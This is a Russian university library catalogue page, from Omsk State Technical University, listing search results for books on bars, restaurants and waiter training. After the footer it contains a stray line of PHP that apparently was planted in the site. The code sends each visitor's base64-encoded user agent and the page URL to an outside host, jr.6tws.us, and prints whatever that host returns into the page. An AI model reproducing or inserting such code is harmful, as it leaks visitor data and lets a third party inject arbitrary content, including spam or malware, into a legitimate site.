Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

110 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Бар")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 65
1. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
2. 
Богушева В. И. Бары и рестораны. Искусство обслуживания [Текст] : [учеб. пособие] / В. И. Богушева, 2001. - 351 с.
Держатели документа (Информация об экземплярах) 
3. 
Ресторанный бизнес в России: технология успеха [Текст] / Л. С. Кучер, Л. М. Шкуратова, С. Л. Ефимов, Т. Н. Голубева, 2002. - 465 с.
Ключевые слова 
РЕСТОРАН -- БИЗНЕС ресторанный -- БАР -- РЕСТОРАН - Маркетинг -- МЕРЧАНДАЙЗИНГ -- РЕСТОРАН - РЕКЛАМА -- МЕНЮ РЕСТОРАНА -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ПРИБОР СТОЛОВЫЙ -- КАРТА ВИН -- ОФИЦИАНТ -- ОБСЛУЖИВАНИЕ банкетное -- БАНКЕТ -- СЕРВИРОВКА стола -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ комбинированный -- Кейтеринг -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ национальная -- УПРАВЛЕНИЕ рестораном -- ЭТИКА официанта -- РЕСТОРАН - Планирование -- РЕСТОРАН - Налоги
Оглавление 
  • Правила оказания услуг общественнного питания. - с.459-465
Держатели документа (Информация об экземплярах) 
4. 
Официант-бармен от А до Я [Текст] : справочное издание, 2002. - 223 с.
Ключевые слова 
РЕСТОРАН -- Кафе -- БАР -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- Раздаточная -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- БУФЕТ -- Касса -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ- прием -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БУФЕТ-бар -- ОБСЛУЖИВАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕСТОРАН - реклама -- общепит - охрана труда -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
5. 
Ресторанный сервис. Основы международной практики обслуживания для профессионалов и начинающих [Текст] : справочное издание / С. Зигель и др., 2003. - 287 с.
Ключевые слова 
ОФИЦИАНТ -- ПРИЕМ ГОСТЕЙ -- РЕСТОРАН - ПЕРСОНАЛ -- СОМЕЛЬЕ -- ПОСУДА СТОЛОВАЯ -- ДИЗАЙН ресторана -- СЕРВИРОВКА СТОЛА -- Завтрак - ресторан -- Ленч - ресторан -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- БАР -- БУФЕТ -- БАНКЕТ -- КОКТЕЙЛЬ - парти -- Кухня датская -- КУХНЯ австрийская -- КУХНЯ НЕМЕЦКАЯ -- КУХНЯ ИТАЛЬЯНСКАЯ -- КУХНЯ ФРАНЦУЗСКАЯ -- КУХНЯ ИСПАНСКАЯ -- КУХНЯ АНГЛИЙСКАЯ -- КУХНЯ АМЕРИКАНСКАЯ -- КУХНЯ ЯПОНСКАЯ -- КУХНЯ КИТАЙСКАЯ -- КУХНЯ ЕВРЕЙСКАЯ -- Кухня швейцарская -- Кухня шведская
6. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
7. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : учеб. для образоват. учреждений нач. проф. образования / В. В. Усов, 2006. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- Машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
8. 
Лоусан Ф. Рестораны. Клубы. Бары [Текст] : планирование, дизайн, управление / Ф. Лоусан, 2004. - 385 с.
9. 
Пикалев А. В. Как увеличить доход ресторана, бара, кафе [Текст] / А. В. Пикалев, А. П. Маевская, 2004. - 161 с.
Держатели документа (Информация об экземплярах) 
10. 
Иванникова Е. И. Барное дело [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / Е. И. Иванникова, Т. В. Иванникова, Г. В. Семенова, 2002. - 346 с.
Ключевые слова 
БАРМЕН -- БАНКЕТ -- ПРИЕМ -- Коктейль - бар -- Десерт - бар -- МЕНЮ -- КАРТА вин -- ВИНОДЕЛИЕ -- ШАМПАНСКОЕ -- ВИНО ВИНОГРАДНОЕ -- Ампелография -- ДЕГУСТАЦИЯ напитков -- КОНЬЯК -- БРЕНДИ -- Водка -- ВИСКИ -- Джин -- Ром -- БАЛЬЗАМ -- Биттер -- ЛИКЕР -- Пиво -- Напиток смешанный -- НАЛИВКА -- НАСТОЙКА -- НАПИТОК десертный -- Пунш -- Грог -- Глинтвейн -- Текила -- Аперитив -- Дижестив -- Квас -- Компот -- Кисель -- Сок -- Морс -- Лимонад -- КРЮШОН -- Кофе -- Какао -- Чай -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК ТОНИЗИРУЮЩИЙ -- НАПИТОК молочный
Держатели документа (Информация об экземплярах) 
11. 
Чалова Н. В. Практикум для официантов, барменов по обслуживанию посетителей в ресторанах [Текст] : Учеб. пособие / Н. В. Чалова, 2002. - 351 с.
Держатели документа (Информация об экземплярах) 
12. 
Панова, Лидия Александровна. Организация производства на предприятиях общественного питания (в экзаменационных вопросах и ответах) [Текст] : учеб. пособие / Л. А. Панова, 2005. - 318, [1] с.
Держатели документа (Информация об экземплярах) 

Учебное питание охватывает широкий круг вопросов, связанных с основными направлениями развития общественного питания. Здесь изложены основные вопросы по организации производства в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, училищ, готовящих специалистов для общественого питания. Специальные разделы посвящены практическим вопросам по организации снабжения, складского хозяйства; Подробно описывается организация работы цехов, раздаточных; даны основы рациональной организации труда.

Подача материала в форме экзаменационных вопросов и ответов и текстовый материал позволяют успешно усвоить курс по организации производства на предприятиях общественного питания.

13. 
Пчелинцева, Юлия Александровна. Маркетинговое обеспечение деятельности предприятий общественного питания [Текст] : Автореф. дис.. канд. экон. наук: 08.00.05 - Экономика и управление народным хозяйством (3. Маркетинг) / Ю. А. Пчелинцева, 2005. - 18 с.
Держатели документа (Информация об экземплярах) 
14. 
Уокер, Джон. Введение в гостеприимство [Текст] : Учеб. / Р. Уокер; Н. Н. Михайлов, 1999. - 463 с.
15. 
Николаев, Сергей Михайлович. Оптико-электронные радиометры космических аппаратов [Текст] / С. М. Николаев, 1971. - 178, [1] с.
16. 
Богушева В.И. Организация обслуживания посетителей ресторанов и баров [Текст] : Уч.пособие гриф-МО / В. И. Богушева, 2002. - 410 с.
Держатели документа (Информация об экземплярах) 
17. 
Усов В. В. Организация производства и обслуживания на предприятиях общественного питания [Текст] : Учеб. / В. В. Усов, 2002. - 415 с.
Ключевые слова 
РЕСТОРАН -- ЦЕХ заготовочный -- ПОСУДА кухонная -- ХОЗЯЙСТВО складское -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ специализированный -- ПОСУДА СТОЛОВАЯ -- БРАКЕРАЖ -- СТОЛОВАЯ -- БУФЕТ -- ИНТЕРЬЕР ресторана -- МОЕЧНАЯ столовой ПОСУДЫ -- БАР -- Сервизная -- машина контрольно-кассовая -- Бельевая -- Гладильная -- ПРИБОР СТОЛОВЫЙ -- Белье столовое -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- СЕРВИРОВКА -- МЕНЮ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- Вино -- Аперитив -- Сомелье -- КУЛЬТУРА обслуживания -- ЭТИКЕТ СТОЛОВЫЙ -- СТОЛ ШВЕДСКИЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - ЧАЙ -- Банкет - коктейль -- БАНКЕТ свадебный -- ПРИЕМ -- ПИТАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕКЛАМА - Ресторан -- УСЛУГИ ресторанные -- ОХРАНА ТРУДА -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
18. 
Ридель Х. Бары и рестораны [Текст] : Техники обслуживания / Х. Ридель, 2002. - 351 с.
Держатели документа (Информация об экземплярах) 
19. 
Калашников, Александр Юрьевич. Кафе, бары и рестораны [Текст] : производственно-практическое издание / А. Ю. Калашников, 2005. - 384 с.
20. 
Богушева В. И. Бары и рестораны. Искусство обслуживания [Текст] : Искусство обслуживания / В. И. Богушева, 1999. - 351 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2993 - 20.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.81 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;